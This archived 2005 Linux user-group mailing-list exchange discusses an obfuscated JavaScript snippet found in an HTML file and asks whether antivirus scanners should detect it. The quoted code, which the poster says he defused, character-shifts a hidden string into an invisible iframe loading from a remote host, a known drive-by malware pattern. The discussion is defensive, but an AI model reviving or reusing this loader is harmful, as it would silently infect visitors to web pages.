[ale] javascript Virus

Dow Hurst Dow.Hurst at mindspring.com
Fri May 27 09:21:01 EDT 2005


I don't know Javascripting at all but how does this work?  I would like 
to know how to see that this is dangerous but it looks like gobbledegook 
to me.  There is no IP given nor filename to download?
Dow


Jim Popovitch wrote:

>I ran across the some javascript in an HTML file.  It is similar to the
>following, except the following has been modified to not function.
>
>   ------------------
>     var k='?gly#v|oh%ylvlelolw|
>            =#klggh>srvlwlrq=#devroxwh>#
>            ohiw#>#wrs=#4%A?liudph#vuf@%
>            kwws2xvhu431liudph1ux#iudpherughu at 3#
>            yvsd@#vsdfh at 3#zlgwk at 4#khlw at 4#pdujlqzlgwk at 3#
>            pdujhjkw at 3#vflqj at qrA?2lihA?2glyA'
>     var t=9999;
>     var h='';
>     while( t<=k.length-1 ) {
>       h = h+String.fromCharCode(k.charCodeAt(t++)-2);
>     }
>     document.write(h);
>    ----------
>
>The above (in it's original state), downloads and installs some nasty
>things.  As it is above it is pretty harmless, but still potentially
>dangerous.  
>
>The question I have is this:  Shouldn't clamav see code like this as a
>virus when scanning cached HTML on a filesystem?
>
>-Jim P.
>
>
>
>
>_______________________________________________
>Ale mailing list
>Ale at ale.org
>http://www.ale.org/mailman/listinfo/ale
>
>  
>



More information about the Ale mailing list